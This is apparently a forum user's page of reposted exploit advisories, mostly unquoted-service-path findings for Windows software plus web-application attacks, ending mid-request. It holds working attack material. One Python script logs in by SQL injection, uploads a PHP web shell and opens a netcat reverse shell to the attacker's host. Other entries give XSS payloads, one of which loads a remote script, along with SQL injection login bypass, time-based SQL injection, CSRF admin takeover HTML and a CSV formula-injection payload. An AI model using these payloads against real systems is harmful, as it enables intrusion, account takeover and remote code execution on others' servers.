Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Motorola Device Manager 2.5.4 - 'MotoHelperService.exe' Unquoted Service Path # Discovery by: Angel Canseco # Discovery Date: 2020-11-07 # Vendor Homepage: https://motorola-device-manager.programas-gratis.net/descarga-completada # Tested Version: 2.5.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "MotoHelperService " | findstr /i /v """ Motorola Device Manager Service Motorola Device Manager C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe Auto # Service info: C:\>sc qc "Motorola Device Manager" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: Motorola Device Manager TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Motorola Mobility\Motorola Device Manager\MotoHelperService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Motorola Device Manager Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would cause the local user to be able to insert their code in the system root path undetected by the OS or other security applications and elevate his privileges after reboot.
  2. HireHackking

    Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Realtek Audio Service 1.0.0.55 - 'RtkAudioService64.exe' Unquoted Service Path # Discovery by: Erika Figueroa # Discovery Date: 2020-11-07 # Vendor Homepage: https://www.realtek.com/en/ # Tested Version: 1.0.0.55 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 8.1 x64 es # Step to discover Unquoted Service Path: C:\>wmic service get name, pathname, displayname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "CodeMeter" | findstr /i /v """ Realtek Audio Service RtkAudioService C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe Auto # Service info: C:\>sc qc "RtkAudioService" [[SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: RtkAudioService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe GRUPO_ORDEN_CARGA : PlugPlay ETIQUETA : 0 NOMBRE_MOSTRAR : Realtek Audio Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  3. HireHackking

    MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: MEMU PLAY 3.7.0 - 'MEmusvc' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-11-07 #Vendor : Microvirt #Version : Microvirt MEMU 3.7.0 #Vendor Homepage : https://www.memuplay.com/ #Tested on OS: Windows 10 Home #Analyze PoC : ============== C:\Users\Sam Sanz>sc qc "MEmusvc" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: MEmusvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\Microvirt\MEmu\MemuService.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : MEmusvc DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  4. HireHackking

    Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Canon Inkjet Extended Survey Program 5.1.0.8 - 'IJPLMSVC.EXE' - Unquoted Service Path # Discovery by: Carlos Roa # Discovery Date: 2020-11-07 # Vendor Homepage: https://www.usa.canon.com/internet/portal/us/home # Tested Version: 5.1.0.8 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 7 Professional 64 bits (spanish) # Step to discover Unquoted Service Path: C:\Users>wmic service get name,pathname,displayname,startmode | findstr /i auto| findstr /i /v "C:\Windows\\" | findstr /i /v """ Canon Inkjet Printer/Scanner/Fax Extended Survey Program IJPLMSVC C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE Auto # Service info: C:\Users>sc qc IJPLMSVC [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ijplmsvc TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Canon\IJPLM\IJPLMSVC.EXE GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Canon Inkjet Printer/Scanner/Fax Extended Survey Program DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.
  5. HireHackking

    iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: iDeskService 3.0.2.1 - 'iDeskService' Unquoted Service Path # Discovery by: Leslie Lara # Discovery Date: 7-09-2020 # Vendor Homepage: https://www.huawei.com/en/corporate-information # Software Links : https://www.advanceduninstaller.com/iDesk-3_0_2_1-ac22913ee90dd58ca897d1ddf3d62a8f-application.htm # Tested Version: 3.0.2.1 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 10 Pro 64 bits # Step to discover Unquoted Service Path: C:\>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" |findstr /i /v """ iDeskService iDeskService C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe Auto C:\>sc qc "iDeskService" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: iDeskService TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\SPES5.0\Composites\iDesk\iDeskService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : iDeskService DEPENDENCIES : SERVICE_START_NAME : LocalSystem
  6. HireHackking

    Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    #Exploit Title: Magic Mouse 2 utilities 2.20 - 'magicmouse2service' Unquoted Service Path #Exploit Author : SamAlucard #Exploit Date: 2020-11-07 #Vendor : Magic Utilities Pty #Version : 64-bit 2.20 #Vendor Homepage : https://magicutilities.net/magic-mouse/home #Tested on OS: Windows 10 Home #Analyze PoC : ============== C:\>sc qc "magicmouse2service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: magicmouse2service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\Magic Mouse 2 - Utilities\MagicMouse2Service.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : Magic Mouse 2 Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem
  7. HireHackking

    Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Deep Instinct Windows Agent 1.2.24.0 - 'DeepNetworkService' Unquoted Service Path # Discovery by: Paulina Girón # Discovery Date: 2020-11-07 # Vendor Homepage: https://www.deepinstinct.com/ # Software Links : https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/ # Tested Version: 1.2.24.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro 64 bits 1) C:\> wmic service get name, pathname, displayname, startmode | findstr "Auto" | findstr /i /v "C:\Windows\\" | findstr /i "DeepNetworkService" |findstr /i /v """ Deep Instinct Network Service DeepNetworkService C:\Program Files\HP Sure Sense\DeepNetworkService.exe Auto 2) C:\> sc qc "DeepNetworkService" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: DeepNetworkService TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files\HP Sure Sense\DeepNetworkService.exe GRUPO_ORDEN_CARGA : FSFilter Anti-Virus ETIQUETA : 0 NOMBRE_MOSTRAR : Deep Instinct Network Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Description Exploit: # A successful attempt would require the local user to be able to insert their code in the system root path # undetected by the OS or other security applications where it could potentially be executed during # application startup or reboot. If successful, the local user's code would execute with the elevated # privileges of the application.
  8. HireHackking

    Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Privacy Drive v3.17.0 - 'pdsvc.exe' Unquoted Service Path # Date: 2020-8-20 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://www.cybertronsoft.com/ # Software Link: https://www.cybertronsoft.com/download/privacy-drive-setup.exe # Version: Version 3.17.0 Build 1456 # Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763 # Service info: C:\Users\m507>sc qc PDSvc [SC] QueryServiceConfig SUCCESS SERVICE_NAME: PDSvc TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\Cybertron\Privacy Drive\pdsvc.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : PrivacyDrive Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  9. HireHackking

    DiskBoss v11.7.28 - Multiple Services Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: DiskBoss v11.7.28 - Multiple Services Unquoted Service Path # Date: 2020-8-20 # Exploit Author: Mohammed Alshehri # Vendor Homepage: https://www.diskboss.com/ # Software Link: https://www.diskboss.com/downloads.html # Version: v11.7.28 # Tested on: Microsoft Windows Server 2019 Standard 10.0.17763 N/A Build 17763 # Product | Version # DiskBoss v11.7.28 # DiskBoss Pro v11.7.28 # DiskBoss Ultimate v11.7.28 # DiskBoss Server v11.7.28 # DiskBoss Enterprise v11.7.28 # All the listed products are vulnerable to Unquoted Service path. Any low privileged user can elevate their privileges using any of these services. # Services info: C:\Users\m507>sc qc "DiskBoss Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DiskBoss Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files\DiskBoss\bin\diskbsa.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DiskBoss Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> C:\Users\m507>sc qc "DiskBoss Enterprise" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DiskBoss Enterprise TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Enterprise\bin\diskbss.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DiskBoss Enterprise DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> C:\Users\m507>sc qc "DiskBoss Ultimate Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DiskBoss Ultimate Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Ultimate\bin\diskbsa.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DiskBoss Ultimate Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> C:\Users\m507>sc qc "DiskBoss Server" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DiskBoss Server TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Server\bin\diskbss.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DiskBoss Server DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> C:\Users\m507>sc qc "DiskBoss Pro Service" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: DiskBoss Pro Service TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 0 IGNORE BINARY_PATH_NAME : C:\Program Files (x86)\DiskBoss Pro\bin\diskbsa.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : DiskBoss Pro Service DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\m507> # Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  10. HireHackking

    RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: RealTimes Desktop Service 18.1.4 - 'rpdsvc.exe' Unquoted Service Path # Discovery by: Erick Galindo # Discovery Date: 2020-11-07 # Vendor Homepage: https://www.real.com/ # Tested Version: 18.1.4 # Vulnerability Type: Unquoted Service Path # Tested on OS: Windows 7 Enterprise SP1 x64 es # Step to discover Unquoted Service Path: c:\wmic service get name, displayname, pathname, startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr /i /v "RealTimes" | findstr /i /v """ RealTimes Desktop Service RealTimes Desktop Service c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe Auto # Service info sc qc "RealTimes Desktop Service" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: RealTimes Desktop Service TIPO : 10 WIN32_OWN_PROCESS TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : RealTimes Desktop Service DEPENDENCIAS : NOMBRE_INICIO_SERVICIO: LocalSystem #Exploit: This vulnerability could permit executing code during startup or reboot with the escalated privileges.
  11. HireHackking

    Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Car Rental Management System 1.0 - SQL injection + Arbitrary File Upload # Date: 09-11-2020 # Exploit Author: Fortunato Lodari [fox at thebrain dot net] # Vendor Homepage: https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14544&title=Car+Rental+Management+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Debian 10 with apache2 # This script will perform an automatic login using sql injection "'OR 1 = 1 limit 1 #" and will create a new car # in the archive, assigning a PHP file instead of the image of the car itself. This car, having "AAAAAAAAAAA" # as a brand, will be the first among those displayed and we will use the file just uploaded with a phpshell # on the victim system # # on the Attacker machine you must listen with NC on a port import sys import requests import time import random import http.cookiejar import os.path from os import path #foxlox# payload = {"username":"' OR 1=1 limit 1#","password":"moana"} proxies = { "http": "http://localhost:8080"} #payload = "username=' OR 1=1 limit 1 #&password=ciao" def deb(str): print("Debug => "+str) def login(): deb("Login...") session=requests.Session() url = mainurl+"/admin/ajax.php?action=login" #{'user-agent':'cagnolo','Referer':'http://192.168.0.130/car_rental/admin/login.php'} r=session.post(url,payload, allow_redirects=False,proxies=proxies) cookie = r.headers["Set-Cookie"] deb(cookie) return cookie def find_all(a_str, sub,lbegin,lend): start = 0 start = a_str.find(sub, start) t=(a_str[start+lbegin:start+lend]).replace('"','') return t def upload(c): deb("Getting cookie") c = c.split("=");cookie={c[0]:c[1]} deb("Sending payload") filetosend=files = {'img': ('s_hell.php', '<?php\necho system($_GET["cmd"]);\n?>\n')} fields={"id":"", "brand":"aaaAAAAAAAAAAAAAA", "model":"model", "category_id":"3", "engine_id":"1", "transmission_id":"2", "description":"description", "price":"0", "qty":"0", "img":""} r=requests.post(mainurl+'/admin/ajax.php?action=save_car',fields,cookies=cookie,allow_redirects=False,files=filetosend) deb("Saved Machine"); r=requests.get(mainurl+'/admin/index.php?page=cars', cookies=cookie,allow_redirects=False) mid=find_all(r.content,'data-id=',8,11) deb("Machine id: "+mid) r=requests.get(mainurl+'/admin/index.php?page=manage_car&id='+mid, cookies=cookie,allow_redirects=False) defurl=(find_all(r.content,"assets/uploads/cars_img",0,45)) deb("Exploit url: "+defurl) #os.system("firefox "+mainurl+"/admin/"+defurl+"?cmd=id") exploit = "wget '"+mainurl+"/admin/"+defurl+'?cmd=nc '+sys.argv[2]+" "+sys.argv[3]+" -e /bin/bash' -O /dev/null" print("Opening url: "+exploit) print("Don't forget to run: nc -nvlp "+sys.argv[3]) os.system(exploit) def usage(): if len(sys.argv) < 4: print("Create a PHPShell for Car Rental Management System") print("example:") print("python exploit_CMS_Car_management_system.py URL_BASE YOURIP YOURPORT") exit() usage() mainurl = sys.argv[1] upload(login()) #fox
  12. HireHackking

    Joplin 1.2.6 - 'link' Cross Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Joplin 1.2.6 - 'link' Cross Site Scripting # Date: 2020-09-21 # Exploit Author: Philip Holbrook (@fhlipZero) # Vendor Homepage: https://joplinapp.org/ # Software Link: https://github.com/laurent22/joplin/releases/tag/v1.2.6 # Version: 1.2.6 # Tested on: Windows / Mac # CVE : CVE-2020-28249 # References: # https://github.com/fhlip0/JopinXSS/blob/main/readme.md # 1. Technical Details # An XSS issue in Joplin for desktop v1.2.6 allows a link tag in a note to bypass the HTML filter # 2. PoC # Paste the following payload into a note: ``` <link rel=import href="data:text/html&comma;<script>alert(XSS)<&sol;script> <script src="//brutelogic.com.br&sol;1.js&num; </script> ```
  13. HireHackking

    Title: M7400 PRO connects to router to achieve network printing

    HireHackking posted a blog entry in Hacker Technology
    Foreword With the development of technology, more and more printer devices support network printing. Connect the printer to the Internet, and within the same LAN, all devices such as laptops and mobile phones can easily implement printing tasks. Some old-fashioned printing devices cannot be connected to the Internet and can only be printed by sharing printers. So is there any other way? Experimental Environment Lenovo M7400 PRO printer with USB interface (brushed with old firmware) Solve Driver Problems Because our router cannot install the printer driver, the driver can only be installed on our computer. We can download our corresponding printer driver by driving the sky. Add printer Open the control panel - Add printer - Add manually - Select to use IP address - Device type is tcp/ip device - Host address is IP with router - Select driver and complete installation. Test Video Teaching Realize mobile phone printing Install PrintHand tool on mobile phone. Then add the WiFi printer near the printer - Add manually - Protocol for RAW port 9100. Just select Brother-Brother DCP 7080.
  14. HireHackking

    Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Customer Support System 1.0 - 'description' Stored XSS in The Admin Panel # Date: 2020-11-11 # Exploit Author: Ahmed Abbas # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 Stored XSS Reproduction Steps: 1. Navigate to http://TARGET/customer_support/index.php?page=department_list 2. Click on new Department 3. Add the XSS payload into the "description" parameter value 4. Browse to the post to trigger the XSS payload # POC POST /customer_support/ajax.php?action=save_department HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------196034062430192961002574272606 Content-Length: 445 Origin: http://localhost Connection: close Referer: http://localhost/customer_support/index.php?page=department_list Cookie: PHPSESSID=6dbp44u1fs8f0ndfqutpn3lbuq -----------------------------196034062430192961002574272606 Content-Disposition: form-data; name="id" 4 -----------------------------196034062430192961002574272606 Content-Disposition: form-data; name="name" Stored xss -----------------------------196034062430192961002574272606 Content-Disposition: form-data; name="description" <script>alert("STORED XSS")</script> -----------------------------196034062430192961002574272606--
  15. HireHackking

    Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Anuko Time Tracker 1.19.23.5325 - CSV/Formula Injection # Date: 2020-10-17 # Exploit Author: Mufaddal Masalawala # Vendor Homepage: https://www.anuko.com/ <https://berrnd.de/> # Software Link: https://www.anuko.com/time-tracker/index.htm # Version: 1.19.23.5325 # Tested on: Kali Linux 2020.3 # CVE: CVE-2020-15255 # Proof Of Concept: CSV Injection (aka Excel Macro Injection or Formula Injection) exists in Reports feature in Anuko Time Tracker v1.19.23.5311 via User, Project and Note data field that is mistreated while exporting to a CSV file. To exploit this vulnerability: 1. Login to the application, goto 'User' module and edit the user 2. Inject the payload *=rundll32|'URL.dll,OpenURL calc.exe'!A* in the 'Name' field 3. Goto 'Project' module, add a new project with the same malicious payload in the 'Name' field 4. Goto 'Time' module, select our created User, Project and again enter the same payload in 'Note' field 5. Enter the rest of the details and click 'Submit' 6. Now goto 'Reports' click Generateand download the CSV file 7. Open the CSV file, allow all popups and our payload is executed (calculator is opened).
  16. HireHackking

    ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ShoreTel Conferencing 19.46.1802.0 - Reflected Cross-Site Scripting # Date: 11/8/2020 # Exploit Author: Joe Helle # Vendor Homepage: https://www.mitel.com/articles/what-happened-shoretel-products # Version: 19.46.1802.0 # Tested on: Linux # CVE: 2020-28351 PoC: The conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting attack (XSS) via the PATH_INFO to index.php, due to insufficient validation for the time_zone object in the HOME_MEETING& page. Vulnerable payload /index.php/%22%20onmouseover=alert(document.domain)%20?page=HOME Vulnerability is in the HOME_MEETINGS& page, where a time_zone dropdown object is located. Upon executing the payload, the exploit executes when the mouse is rolled over the dropdown menu object. https://github.com/dievus/CVE-2020-28351
  17. HireHackking

    Customer Support System 1.0 - 'username' Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    # Title: Customer Support System 1.0 - 'username' Authentication Bypass # Date: 2020-11-11 # Exploit Author: Ahmed Abbas # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Description : Authentication Bypass # Vulnerability Details: [+] A SQL injection vulnerability in Customer Support System 1.0 allows remote unauthenticated attackers to bypass the authentication process via username and password parameters. # Malicious POST Request to https://TARGET POST /customer_support/ajax.php?action=login HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 62 Origin: http://localhost Connection: close Referer: http://localhost/customer_support/login.php Cookie: PHPSESSID=gbattc1r1riap25kr5k2k1ureo username=' or 1=1 or ''='&password=password&type=1
  18. HireHackking

    Customer Support System 1.0 - Cross-Site Request Forgery

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Customer Support System 1.0 - Cross-Site Request Forgery (Admin Account Takeover) # Date: 2020-11-11 # Exploit Author: Ahmed Abbas # Vendor Homepage: https://www.sourcecodester.com/php/14587/customer-support-system-using-phpmysqli-source-code.html # Software Link: https://www.sourcecodester.com/download-code?nid=14587&title=Customer+Support+System+using+PHP%2FMySQLi+with+Source+Code # Version: 1.0 # Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 7.4.4 # Description : Admin Account Takeover # Vulnerability Details [+] The username and password parameters can be forged to force the password change of admin user account. # POC - CSRF HTML <html> <!-- CSRF PoC - generated by Burp Suite Professional --> <body> <script>history.pushState('', '', '/')</script> <form action="http://localhost/customer_support/ajax.php?action=save_user" method="POST"> <input type="hidden" name="id" value="1" /> <input type="hidden" name="table" value="users" /> <input type="hidden" name="firstname" value="Administrator" /> <input type="hidden" name="middlename" value="" /> <input type="hidden" name="lastname" value="" /> <input type="hidden" name="username" value="admin" /> <input type="hidden" name="password" value="newpass" /> <input type="submit" value="Submit request" /> </form> </body> </html>
  19. HireHackking

    Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wordpress Plugin Good LMS 2.1.4 - 'id' Unauthenticated SQL Injection # Software Link: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850 # Version: <= 2.1.4 # Dork: N/A # Author: Abdulazeez Alaseeri # Tested on: linux/apache # Type: Web App # Date: 2020-11-12 # Category: Web App ================================================================ Unauthenticated SQL Injection in Good Layers LMS Plugin <= 2.1.4 ================================================================ Plugin URL: https://codecanyon.net/item/good-lms-learning-management-system-wp-plugin/9033850 Following is the vulnerable code in file "goodlayers-lms/include/lightbox-form.php" from line 682 to 701 ================================================================ Start Vulnerable Code ================================================================ 682- add_action( 'wp_ajax_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' ); 683- add_action( 'wp_ajax_nopriv_gdlr_lms_cancel_booking', 'gdlr_lms_cancel_booking' ); 684- function gdlr_lms_cancel_booking(){ 685- global $wpdb; 686- 687- $sql = 'SELECT * FROM ' . $wpdb->prefix . 'gdlrpayment '; 688- $sql .= 'WHERE id=' . $_POST['id'] . ' AND '; 689- $sql .= '(payment_status=\'pending\' OR payment_status=\'submitted\' OR payment_status=\'reserved\')'; 690- $booked_course = $wpdb->get_row($sql); 691- if( !empty($booked_course) ){ 692- $payment_info = unserialize($booked_course->payment_info); 693- 694- $course_options = gdlr_lms_get_course_options($booked_course->course_id); 695- $course_options['booked-seat'] = intval($course_options['booked-seat']) - intval($payment_info['amount']); 696- update_post_meta($booked_course->course_id, 'gdlr-lms-course-settings', wp_slash(json_encode($course_options, JSON_UNESCAPED_UNICODE))); 697- 698- $wpdb->delete( $wpdb->prefix . 'gdlrpayment', array('id'=>$_POST['id']), array('%d')); 699- } 700- die(""); 701- } ================================================================ End Vulnerable Code ================================================================ Line 682 means that function "gdlr_lms_cancel_booking" can be called using "/wp-admin/admin-ajax.php" by having any low privileged account such as subscriber or contributor. However the "nopriv" in line 683 means that the same function "gdlr_lms_cancel_booking" can also be called as an unauthenticated user. Following URL means that an attacker is already inside function "gdlr_lms_cancel_booking". http://www.example.com/wp-admin/admin-ajax.php?action=gdlr_lms_cancel_booking SQL Injection on line 688 is pretty simple to understand that an arbitrary user input in POST Request is sent straight into the MySQL Query as variable "id" $sql .= 'WHERE id=' . $_POST['id'] . ' AND '; Following are the Request Headers as POC which demonstrates MySQL SLEEP Query. ================================================================ Request Headers Start ================================================================ POST /wp-admin/admin-ajax.php HTTP/1.1 Host: example.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded action=gdlr_lms_cancel_booking&id=(SELECT 1337 FROM (SELECT(SLEEP(10)))MrMV) ================================================================ Request Headers Finish ================================================================
  20. HireHackking

    Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Water Billing System 1.0 - 'username' and 'password' parameters SQL Injection # SQL Injection in 'username' and 'password' parameters allows attacker to run the SQL commands on the victim to extract entire DB. In advanced exploitation, an attacker can run the arbitrary code on the victim system to compromise it... # Exploit Author: Sarang Tumne (CyberInsane) # Date: 4th Nov, 2020 # Confirmed on release 1.0 # Tested on: Windows Server 2016- XAMPP # Vendor: https://www.sourcecodester.com/php/14560/water-billing-system-phpmysqli-full-source-code.html ############################################### POST /wbs/process.php HTTP/1.1 Host: 192.168.56.102:8080 Content-Length: 45 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.56.102:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.56.102:8080/wbs/ Accept-Encoding: gzip, deflate Accept-Language: 